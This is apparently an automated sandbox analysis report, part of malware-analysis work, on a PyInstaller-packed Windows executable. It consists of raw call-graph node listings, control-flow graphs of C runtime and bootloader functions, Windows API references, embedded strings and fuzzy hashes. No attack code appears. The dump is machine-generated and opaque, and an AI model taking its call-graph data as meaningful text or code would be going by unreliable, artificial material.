7ff602994ff7 __vcrt_freefls 18996->18856 18997->18996 18998 7ff602994160 47 API calls 18997->18998 18998->18997 19032 7ff6029a5b34 19031->19032 19035 7ff6029a5000 19032->19035 19036 7ff6029a5031 19035->19036 19037 7ff6029a5043 19035->19037 19038 7ff6029a4144 _set_fmode 11 API calls 19036->19038 19039 7ff6029a508d 19037->19039 19041 7ff6029a5050 19037->19041 19096->17243 16513 7ff6029a4688 16514 7ff6029a46bf 16513->16514 16515 7ff6029a46a2 16513->16515 16514->16515 16516 7ff6029a46d2 CreateFileW 16514->16516 16564 7ff6029a4124 16515->16564 16518 7ff6029a4706 16516->16518 16519 7ff6029a473c 16516->16519 16538 7ff6029a47dc GetFileType 16518->16538 16567 7ff6029a4c64 16519->16567 16523 7ff6029a4144 _set_fmode 11 API calls 16526 7ff6029a46af 16523->16526 16531 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16526->16531 16527 7ff6029a4731 CloseHandle 16533 7ff6029a46ba 16527->16533 16528 7ff6029a471b CloseHandle 16528->16533 16529 7ff6029a4770 16588 7ff6029a4a24 16529->16588 16530 7ff6029a4745 16534 7ff6029a40b8 _fread_nolock 11 API calls 16530->16534 16531->16533 16537 7ff6029a474f 16534->16537 16537->16533 16539 7ff6029a48e7 16538->16539 16540 7ff6029a482a 16538->16540 16542 7ff6029a48ef 16539->16542 16543 7ff6029a4911 16539->16543 16541 7ff6029a4856 GetFileInformationByHandle 16540->16541 16545 7ff6029a4b60 21 API calls 16540->16545 16546 7ff6029a487f 16541->16546 16547 7ff6029a4902 GetLastError 16541->16547 16542->16547 16548 7ff6029a48f3 16542->16548 16544 7ff6029a4934 PeekNamedPipe 16543->16544 16554 7ff6029a48d2 16543->16554 16544->16554 16549 7ff6029a4844 16545->16549 16550 7ff6029a4a24 51 API calls 16546->16550 16552 7ff6029a40b8 _fread_nolock 11 API calls 16547->16552 16551 7ff6029a4144 _set_fmode 11 API calls 16548->16551 16549->16541 16549->16554 16555 7ff6029a488a 16550->16555 16551->16554 16552->16554 16553 7ff60299b5c0 _log10_special 8 API calls 16556 7ff6029a4714 16553->16556 16554->16553 16605 7ff6029a4984 16555->16605 16556->16527 16556->16528 16559 7ff6029a4984 10 API calls 16560 7ff6029a48a9 16559->16560 16561 7ff6029a4984 10 API calls 16560->16561 16562 7ff6029a48ba 16561->16562 16562->16554 16563 7ff6029a4144 _set_fmode 11 API calls 16562->16563 16563->16554 16565 7ff6029aa148 _set_fmode 11 API calls 16564->16565 16566 7ff6029a412d 16565->16566 16566->16523 16568 7ff6029a4c9a 16567->16568 16569 7ff6029a4d32 __vcrt_freefls 16568->16569 16570 7ff6029a4144 _set_fmode 11 API calls 16568->16570 16571 7ff60299b5c0 _log10_special 8 API calls 16569->16571 16572 7ff6029a4cac 16570->16572 16573 7ff6029a4741 16571->16573 16574 7ff6029a4144 _set_fmode 11 API calls 16572->16574 16573->16529 16573->16530 16575 7ff6029a4cb4 16574->16575 16612 7ff6029a6c80 16575->16612 16577 7ff6029a4cc9 16578 7ff6029a4cd1 16577->16578 16579 7ff6029a4cdb 16577->16579 16580 7ff6029a4144 _set_fmode 11 API calls 16578->16580 16581 7ff6029a4144 _set_fmode 11 API calls 16579->16581 16582 7ff6029a4cd6 16580->16582 16583 7ff6029a4ce0 16581->16583 16582->16569 16587 7ff6029a4d24 GetDriveTypeW 16582->16587 16583->16569 16584 7ff6029a4144 _set_fmode 11 API calls 16583->16584 16585 7ff6029a4cea 16584->16585 16586 7ff6029a6c80 45 API calls 16585->16586 16586->16582 16587->16569 16590 7ff6029a4a4c 16588->16590 16589 7ff6029a477d 16598 7ff6029a4b60 16589->16598 16590->16589 16706 7ff6029ae5a4 16590->16706 16592 7ff6029a4ae0 16592->16589 16593 7ff6029ae5a4 51 API calls 16592->16593 16594 7ff6029a4af3 16593->16594 16594->16589 16595 7ff6029ae5a4 51 API calls 16594->16595 16596 7ff6029a4b06 16595->16596 16596->16589 16597 7ff6029ae5a4 51 API calls 16596->16597 16597->16589 16599 7ff6029a4b7a 16598->16599 16600 7ff6029a4bb1 16599->16600 16601 7ff6029a4b8a 16599->16601 16602 7ff6029ae438 21 API calls 16600->16602 16603 7ff6029a40b8 _fread_nolock 11 API calls 16601->16603 16604 7ff6029a4b9a 16601->16604 16602->16604 16603->16604 16604->16537 16606 7ff6029a49a0 16605->16606 16607 7ff6029a49ad FileTimeToSystemTime 16605->16607 16606->16607 16610 7ff6029a49a8 16606->16610 16608 7ff6029a49c1 SystemTimeToTzSpecificLocalTime 16607->16608 16607->16610 16608->16610 16609 7ff60299b5c0 _log10_special 8 API calls 16611 7ff6029a4899 16609->16611 16610->16609 16611->16559 16613 7ff6029a6d0a 16612->16613 16614 7ff6029a6c9c 16612->16614 16649 7ff6029af54c 16613->16649 16614->16613 16616 7ff6029a6ca1 16614->16616 16617 7ff6029a6cd6 16616->16617 16618 7ff6029a6cb9 16616->16618 16632 7ff6029a6ac4 GetFullPathNameW 16617->16632 16624 7ff6029a6a50 GetFullPathNameW 16618->16624 16623 7ff6029a6cce __vcrt_freefls 16623->16577 16625 7ff6029a6a76 GetLastError 16624->16625 16626 7ff6029a6a8c 16624->16626 16628 7ff6029a40b8 _fread_nolock 11 API calls 16625->16628 16627 7ff6029a6a88 16626->16627 16631 7ff6029a4144 _set_fmode 11 API calls 16626->16631 16627->16623 16629 7ff6029a6a83 16628->16629 16630 7ff6029a4144 _set_fmode 11 API calls 16629->16630 16630->16627 16631->16627 16633 7ff6029a6af7 GetLastError 16632->16633 16636 7ff6029a6b0d __vcrt_freefls 16632->16636 16634 7ff6029a40b8 _fread_nolock 11 API calls 16633->16634 16635 7ff6029a6b04 16634->16635 16638 7ff6029a4144 _set_fmode 11 API calls 16635->16638 16637 7ff6029a6b09 16636->16637 16639 7ff6029a6b67 GetFullPathNameW 16636->16639 16640 7ff6029a6b9c 16637->16640 16638->16637 16639->16633 16639->16637 16641 7ff6029a6c10 memcpy_s 16640->16641 16645 7ff6029a6bc5 memcpy_s 16640->16645 16641->16623 16642 7ff6029a6bf9 16643 7ff6029a4144 _set_fmode 11 API calls 16642->16643 16644 7ff6029a6bfe 16643->16644 16646 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16644->16646 16645->16641 16645->16642 16647 7ff6029a6c32 16645->16647 16646->16641 16647->16641 16648 7ff6029a4144 _set_fmode 11 API calls 16647->16648 16648->16644 16652 7ff6029af35c 16649->16652 16653 7ff6029af39e 16652->16653 16654 7ff6029af387 16652->16654 16656 7ff6029af3a2 16653->16656 16657 7ff6029af3c3 16653->16657 16655 7ff6029a4144 _set_fmode 11 API calls 16654->16655 16661 7ff6029af38c 16655->16661 16678 7ff6029af4c8 16656->16678 16690 7ff6029ae438 16657->16690 16660 7ff6029af3c8 16667 7ff6029af46d 16660->16667 16673 7ff6029af3ef 16660->16673 16664 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16661->16664 16663 7ff6029af3ab 16665 7ff6029a4124 _fread_nolock 11 API calls 16663->16665 16677 7ff6029af397 __vcrt_freefls 16664->16677 16666 7ff6029af3b0 16665->16666 16669 7ff6029a4144 _set_fmode 11 API calls 16666->16669 16667->16654 16670 7ff6029af475 16667->16670 16668 7ff60299b5c0 _log10_special 8 API calls 16671 7ff6029af4bd 16668->16671 16669->16661 16672 7ff6029a6a50 13 API calls 16670->16672 16671->16623 16672->16677 16674 7ff6029a6ac4 14 API calls 16673->16674 16675 7ff6029af433 16674->16675 16676 7ff6029a6b9c 37 API calls 16675->16676 16675->16677 16676->16677 16677->16668 16679 7ff6029af512 16678->16679 16680 7ff6029af4e2 16678->16680 16681 7ff6029af51d GetDriveTypeW 16679->16681 16683 7ff6029af4fd 16679->16683 16682 7ff6029a4124 _fread_nolock 11 API calls 16680->16682 16681->16683 16684 7ff6029af4e7 16682->16684 16686 7ff60299b5c0 _log10_special 8 API calls 16683->16686 16685 7ff6029a4144 _set_fmode 11 API calls 16684->16685 16687 7ff6029af4f2 16685->16687 16688 7ff6029af3a7 16686->16688 16689 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16687->16689 16688->16660 16688->16663 16689->16683 16704 7ff6029b9530 16690->16704 16693 7ff6029ae485 16696 7ff60299b5c0 _log10_special 8 API calls 16693->16696 16694 7ff6029ae4ac 16695 7ff6029ada18 _set_fmode 11 API calls 16694->16695 16697 7ff6029ae4bb 16695->16697 16698 7ff6029ae519 16696->16698 16699 7ff6029ae4d4 16697->16699 16700 7ff6029ae4c5 GetCurrentDirectoryW 16697->16700 16698->16660 16702 7ff6029a4144 _set_fmode 11 API calls 16699->16702 16700->16699 16701 7ff6029ae4d9 16700->16701 16703 7ff6029a97c8 __free_lconv_mon 11 API calls 16701->16703 16702->16701 16703->16693 16705 7ff6029ae46e GetCurrentDirectoryW 16704->16705 16705->16693 16705->16694 16707 7ff6029ae5b1 16706->16707 16708 7ff6029ae5d5 16706->16708 16707->16708 16709 7ff6029ae5b6 16707->16709 16710 7ff6029ae60f 16708->16710 16713 7ff6029ae62e 16708->16713 16711 7ff6029a4144 _set_fmode 11 API calls 16709->16711 16712 7ff6029a4144 _set_fmode 11 API calls 16710->16712 16714 7ff6029ae5bb 16711->16714 16715 7ff6029ae614 16712->16715 16716 7ff6029a3ec8 45 API calls 16713->16716 16717 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16714->16717 16719 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16715->16719 16721 7ff6029ae63b 16716->16721 16718 7ff6029ae5c6 16717->16718 16718->16592 16720 7ff6029ae61f 16719->16720 16720->16592 16721->16720 16722 7ff6029b42a0 51 API calls 16721->16722 16722->16721 16723 7ff6029ae80c 16724 7ff6029ae9fe 16723->16724 16727 7ff6029ae84e _isindst 16723->16727 16725 7ff6029a4144 _set_fmode 11 API calls 16724->16725 16743 7ff6029ae9ee 16725->16743 16726 7ff60299b5c0 _log10_special 8 API calls 16728 7ff6029aea19 16726->16728 16727->16724 16729 7ff6029ae8ce _isindst 16727->16729 16744 7ff6029b5014 16729->16744 16734 7ff6029aea2a 16735 7ff6029a9780 _isindst 17 API calls 16734->16735 16737 7ff6029aea3e 16735->16737 16741 7ff6029ae92b 16741->16743 16768 7ff6029b5058 16741->16768 16743->16726 16745 7ff6029ae8ec 16744->16745 16746 7ff6029b5023 16744->16746 16750 7ff6029b4418 16745->16750 16775 7ff6029af158 EnterCriticalSection 16746->16775 16751 7ff6029b4421 16750->16751 16755 7ff6029ae901 16750->16755 16752 7ff6029a4144 _set_fmode 11 API calls 16751->16752 16753 7ff6029b4426 16752->16753 16754 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16753->16754 16754->16755 16755->16734 16756 7ff6029b4448 16755->16756 16757 7ff6029b4451 16756->16757 16758 7ff6029ae912 16756->16758 16759 7ff6029a4144 _set_fmode 11 API calls 16757->16759 16758->16734 16762 7ff6029b4478 16758->16762 16760 7ff6029b4456 16759->16760 16761 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16760->16761 16761->16758 16763 7ff6029b4481 16762->16763 16767 7ff6029ae923 16762->16767 16764 7ff6029a4144 _set_fmode 11 API calls 16763->16764 16765 7ff6029b4486 16764->16765 16766 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 16765->16766 16766->16767 16767->16734 16767->16741 16776 7ff6029af158 EnterCriticalSection 16768->16776

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00007FF602991000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 332COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 0 7ff602991000-7ff602993536 call 7ff60299ee88 call 7ff60299ee90 call 7ff60299b8c0 call 7ff6029a4450 call 7ff6029a44e4 call 7ff6029933e0 14 7ff602993544-7ff602993566 call 7ff6029918f0 0->14 15 7ff602993538-7ff60299353f 0->15 21 7ff602993736-7ff60299374c call 7ff602993f50 14->21 22 7ff60299356c-7ff602993583 call 7ff602991bf0 14->22 16 7ff60299371a-7ff602993735 call 7ff60299b5c0 15->16 27 7ff60299374e-7ff60299377b call 7ff6029975f0 21->27 28 7ff602993785-7ff60299379a call 7ff6029925f0 21->28 26 7ff602993588-7ff6029935c1 22->26 29 7ff602993653-7ff60299366d call 7ff602997d60 26->29 30 7ff6029935c7-7ff6029935cb 26->30 45 7ff60299379f-7ff6029937be call 7ff602991bf0 27->45 46 7ff60299377d-7ff602993780 call 7ff60299f0bc 27->46 41 7ff602993712 28->41 42 7ff60299366f-7ff602993675 29->42 43 7ff602993695-7ff60299369c 29->43 33 7ff602993638-7ff60299364d call 7ff6029918e0 30->33 34 7ff6029935cd-7ff6029935e5 call 7ff6029a42b0 30->34 33->29 33->30 50 7ff6029935f2-7ff60299360a call 7ff6029a42b0 34->50 51 7ff6029935e7-7ff6029935eb 34->51 41->16 48 7ff602993682-7ff602993690 call 7ff6029a3eac 42->48 49 7ff602993677-7ff602993680 42->49 53 7ff6029936a2-7ff6029936c0 call 7ff602997d60 call 7ff602997ed0 43->53 54 7ff602993844-7ff602993863 call 7ff602993e70 43->54 61 7ff6029937c1-7ff6029937ca 45->61 46->28 48->43 49->48 66 7ff602993617-7ff60299362f call 7ff6029a42b0 50->66 67 7ff60299360c-7ff602993610 50->67 51->50 79 7ff60299380f-7ff60299381e call 7ff602998160 53->79 80 7ff6029936c6-7ff6029936c9 53->80 69 7ff602993871-7ff602993882 call 7ff602991bf0 54->69 70 7ff602993865-7ff60299386f call 7ff602993fc0 54->70 61->61 65 7ff6029937cc-7ff6029937e9 call 7ff6029918f0 61->65 65->26 84 7ff6029937ef-7ff602993800 call 7ff6029925f0 65->84 66->33 85 7ff602993631 66->85 67->66 76 7ff602993887-7ff6029938a1 call 7ff602998410 69->76 70->76 93 7ff6029938af-7ff6029938c1 SetDllDirectoryW 76->93 94 7ff6029938a3 76->94 91 7ff602993820 79->91 92 7ff60299382c-7ff60299382f call 7ff602997b90 79->92 80->79 86 7ff6029936cf-7ff6029936f6 call 7ff602991bf0 80->86 84->41 85->33 97 7ff602993805-7ff60299380d call 7ff6029a3eac 86->97 98 7ff6029936fc-7ff602993703 call 7ff6029925f0 86->98 91->92 103 7ff602993834-7ff602993836 92->103 100 7ff6029938d0-7ff6029938ec call 7ff602996530 call 7ff602996aa0 93->100 101 7ff6029938c3-7ff6029938ca 93->101 94->93 97->76 107 7ff602993708-7ff60299370a 98->107 118 7ff6029938ee-7ff6029938f4 100->118 119 7ff602993947-7ff60299394a call 7ff6029964e0 100->119 101->100 104 7ff602993a38-7ff602993a40 101->104 103->76 108 7ff602993838 103->108 111 7ff602993a42-7ff602993a5f PostMessageW GetMessageW 104->111 112 7ff602993a65-7ff602993a97 call 7ff6029933d0 call 7ff602993080 call 7ff6029933a0 call 7ff602996750 call 7ff6029964e0 104->112 107->41 108->54 111->112 121 7ff60299390e-7ff602993918 call 7ff602996910 118->121 122 7ff6029938f6-7ff602993903 call 7ff602996570 118->122 124 7ff60299394f-7ff602993956 119->124 134 7ff602993923-7ff602993931 call 7ff602996c70 121->134 135 7ff60299391a-7ff602993921 121->135 122->121 132 7ff602993905-7ff60299390c 122->132 124->104 129 7ff60299395c-7ff602993966 call 7ff6029930e0 124->129 129->107 141 7ff60299396c-7ff602993980 call 7ff602998140 129->141 137 7ff60299393a-7ff602993942 call 7ff602992870 call 7ff602996750 132->137 134->124 146 7ff602993933 134->146 135->137 137->119 151 7ff602993982-7ff60299399f PostMessageW GetMessageW 141->151 152 7ff6029939a5-7ff6029939e1 call 7ff602997e70 call 7ff602997f10 call 7ff602996750 call 7ff6029964e0 call 7ff602997e10 141->152 146->137 151->152 162 7ff6029939e6-7ff6029939e8 152->162 163 7ff602993a25-7ff602993a33 call 7ff6029918a0 162->163 164 7ff6029939ea-7ff6029939f8 162->164 163->107 165 7ff602993a19-7ff602993a20 call 7ff602992870 164->165 166 7ff6029939fa-7ff602993a14 call 7ff6029925f0 call 7ff6029918a0 164->166 165->163 166->107
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                            • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                            • API String ID: 514040917-585287483
                                                                                                                                                                                                                            • Opcode ID: dae27c143a2730aa20f2f351da27581a33cc1647660e341f1e3562345396aeee
                                                                                                                                                                                                                            • Instruction ID: 3e3a978948b26bc0310a5d795479d52a3854b72f0760146adda1935af088f458
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dae27c143a2730aa20f2f351da27581a33cc1647660e341f1e3562345396aeee
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F19021A08782A9FB19DB2BD5542F96B51FF447A8FA04032DA5DC32D7EFACE564C340
                                                                                                                                                                                                                            Function 00007FF6029B4A80 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 300 7ff6029b4a80-7ff6029b4abb call 7ff6029b4408 call 7ff6029b4410 call 7ff6029b4478 307 7ff6029b4ac1-7ff6029b4acc call 7ff6029b4418 300->307 308 7ff6029b4ce5-7ff6029b4d31 call 7ff6029a9780 call 7ff6029b4408 call 7ff6029b4410 call 7ff6029b4478 300->308 307->308 313 7ff6029b4ad2-7ff6029b4adc 307->313 333 7ff6029b4e6f-7ff6029b4edd call 7ff6029a9780 call 7ff6029b0304 308->333 334 7ff6029b4d37-7ff6029b4d42 call 7ff6029b4418 308->334 315 7ff6029b4afe-7ff6029b4b02 313->315 316 7ff6029b4ade-7ff6029b4ae1 313->316 320 7ff6029b4b05-7ff6029b4b0d 315->320 318 7ff6029b4ae4-7ff6029b4aef 316->318 321 7ff6029b4af1-7ff6029b4af8 318->321 322 7ff6029b4afa-7ff6029b4afc 318->322 320->320 324 7ff6029b4b0f-7ff6029b4b22 call 7ff6029ac47c 320->324 321->318 321->322 322->315 325 7ff6029b4b2b-7ff6029b4b39 322->325 331 7ff6029b4b24-7ff6029b4b26 call 7ff6029a97c8 324->331 332 7ff6029b4b3a-7ff6029b4b46 call 7ff6029a97c8 324->332 331->325 340 7ff6029b4b4d-7ff6029b4b55 332->340 352 7ff6029b4edf-7ff6029b4ee6 333->352 353 7ff6029b4eeb-7ff6029b4eee 333->353 334->333 344 7ff6029b4d48-7ff6029b4d53 call 7ff6029b4448 334->344 340->340 343 7ff6029b4b57-7ff6029b4b68 call 7ff6029af2f4 340->343 343->308 354 7ff6029b4b6e-7ff6029b4bc4 call 7ff6029b9530 * 4 call 7ff6029b499c 343->354 344->333 355 7ff6029b4d59-7ff6029b4d7c call 7ff6029a97c8 GetTimeZoneInformation 344->355 357 7ff6029b4f7b-7ff6029b4f7e 352->357 359 7ff6029b4ef0 353->359 360 7ff6029b4f25-7ff6029b4f38 call 7ff6029ac47c 353->360 413 7ff6029b4bc6-7ff6029b4bca 354->413 368 7ff6029b4e44-7ff6029b4e6e call 7ff6029b4400 call 7ff6029b43f0 call 7ff6029b43f8 355->368 369 7ff6029b4d82-7ff6029b4da3 355->369 364 7ff6029b4f84-7ff6029b4f8c call 7ff6029b4a80 357->364 365 7ff6029b4ef3 357->365 359->365 377 7ff6029b4f43-7ff6029b4f5e call 7ff6029b0304 360->377 378 7ff6029b4f3a 360->378 366 7ff6029b4ef8-7ff6029b4f24 call 7ff6029a97c8 call 7ff60299b5c0 364->366 365->366 367 7ff6029b4ef3 call 7ff6029b4cfc 365->367 367->366 373 7ff6029b4dae-7ff6029b4db5 369->373 374 7ff6029b4da5-7ff6029b4dab 369->374 381 7ff6029b4dc9 373->381 382 7ff6029b4db7-7ff6029b4dbf 373->382 374->373 400 7ff6029b4f60-7ff6029b4f63 377->400 401 7ff6029b4f65-7ff6029b4f77 call 7ff6029a97c8 377->401 385 7ff6029b4f3c-7ff6029b4f41 call 7ff6029a97c8 378->385 393 7ff6029b4dcb-7ff6029b4e3f call 7ff6029b9530 * 4 call 7ff6029b18dc call 7ff6029b4f94 * 2 381->393 382->381 388 7ff6029b4dc1-7ff6029b4dc7 382->388 385->359 388->393 393->368 400->385 401->357 414 7ff6029b4bd0-7ff6029b4bd4 413->414 415 7ff6029b4bcc 413->415 414->413 417 7ff6029b4bd6-7ff6029b4bfb call 7ff6029a5bb8 414->417 415->414 424 7ff6029b4bfe-7ff6029b4c02 417->424 426 7ff6029b4c11-7ff6029b4c15 424->426 427 7ff6029b4c04-7ff6029b4c0f 424->427 426->424 427->426 429 7ff6029b4c17-7ff6029b4c1b 427->429 431 7ff6029b4c9c-7ff6029b4ca0 429->431 432 7ff6029b4c1d-7ff6029b4c45 call 7ff6029a5bb8 429->432 433 7ff6029b4ca2-7ff6029b4ca4 431->433 434 7ff6029b4ca7-7ff6029b4cb4 431->434 440 7ff6029b4c63-7ff6029b4c67 432->440 441 7ff6029b4c47 432->441 433->434 436 7ff6029b4ccf-7ff6029b4cde call 7ff6029b4400 call 7ff6029b43f0 434->436 437 7ff6029b4cb6-7ff6029b4ccc call 7ff6029b499c 434->437 436->308 437->436 440->431 443 7ff6029b4c69-7ff6029b4c87 call 7ff6029a5bb8 440->443 445 7ff6029b4c4a-7ff6029b4c51 441->445 452 7ff6029b4c93-7ff6029b4c9a 443->452 445->440 448 7ff6029b4c53-7ff6029b4c61 445->448 448->440 448->445 452->431 453 7ff6029b4c89-7ff6029b4c8d 452->453 453->431 454 7ff6029b4c8f 453->454 454->452
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4AC5
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4418: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B442C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: RtlFreeHeap.NTDLL(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97DE
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A97C8: GetLastError.KERNEL32(?,?,?,00007FF6029B1AA2,?,?,?,00007FF6029B1ADF,?,?,00000000,00007FF6029B1FA5,?,?,?,00007FF6029B1ED7), ref: 00007FF6029A97E8
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A9780: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A9789
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029A9780: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6029A975F,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029A97AE
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4AB4
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029B4478: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6029B448C
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D2A
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D3B
                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6029B4D4C
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6029B4F8C), ref: 00007FF6029B4D73
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1883221060.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883197673.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883253235.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883276961.00007FF6029D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1883316036.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                            • API String ID: 4070488512-239921721
                                                                                                                                                                                                                            • Opcode ID: 149cc761c71c7f80a40e0a1614b9a4a56140eaa86546ac9271ecb50e391a13f8
                                                                                                                                                                                                                            • Instruction ID: 9ccd91559210efa3a427553eb2847510f54a8642867b88858184a780e28a8a21
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 149cc761c71c7f80a40e0a1614b9a4a56140eaa86546ac9271ecb50e391a13f8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74D1F326E1821246EB21DF27D6601B96BA1FF84B8CF606035EA4DC7A87DFBCE441D340
                                                                                                                                                                                                                            Function 00007FF6029B59CC Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 485 7ff6029b59cc-7ff6029b5a3f call 7ff6029b5700 488 7ff6029b5a41-7ff6029b5a4a call 7ff6029a4124 485->488 489 7ff6029b5a59-7ff6029b5a63 call 7ff6029a7398 485->489 494 7ff6029b5a4d-7ff6029b5a54 call 7ff6029a4144 488->494 495 7ff6029b5a7e-7ff6029b5ae7 CreateFileW 489->495 496 7ff6029b5a65-7ff6029b5a7c call 7ff6029a4124 call 7ff6029a4144 489->496 509 7ff6029b5d9a-7ff6029b5dba 494->509 499 7ff6029b5b64-7ff6029b5b6f GetFileType 495->499 500 7ff6029b5ae9-7ff6029b5aef 495->500 496->494 504 7ff6029b5b71-7ff6029b5bac GetLastError call 7ff6029a40b8 CloseHandle 499->504 505 7ff6029b5bc2-7ff6029b5bc9 499->505 501 7ff6029b5b31-7ff6029b5b5f GetLastError call 7ff6029a40b8 500->501 502 7ff6029b5af1-7ff6029b5af5 500->502 501->494 502->501 507 7ff6029b5af7-7ff6029b5b2f CreateFileW 502->507 504->494 520 7ff6029b5bb2-7ff6029b5bbd call 7ff6029a4144 504->520 512 7ff6029b5bd1-7ff6029b5bd4 505->512 513 7ff6029b5bcb-7ff6029b5bcf 505->513 507->499 507->501 517 7ff6029b5bda-7ff6029b5c2f call 7ff6029a72b0 512->517 518 7ff6029b5bd6 512->518 513->517 523 7ff6029b5c31-7ff6029b5c3d call 7ff6029b5908 517->523 524 7ff6029b5c4e-7ff6029b5c7f call 7ff6029b5480 517->524 518->517 520->494 523->524 530 7ff6029b5c3f 523->530 531 7ff6029b5c81-7ff6029b5c83 524->531 532 7ff6029b5c85-7ff6029b5cc7 524->532 533 7ff6029b5c41-7ff6029b5c49 call 7ff6029a9940 530->533 531->533 534 7ff6029b5ce9-7ff6029b5cf4 532->534 535 7ff6029b5cc9-7ff6029b5ccd 532->535 533->509 537 7ff6029b5d98 534->537 538 7ff6029b5cfa-7ff6029b5cfe 534->538 535->534 536 7ff6029b5ccf-7ff6029b5ce4 535->536 536->534 537->509 538->537 540 7ff6029b5d04-7ff6029b5d49 CloseHandle CreateFileW 538->540 542 7ff6029b5d7e-7ff6029b5d93 540->542 543 7ff6029b5d4b-7ff6029b5d79 GetLastError call 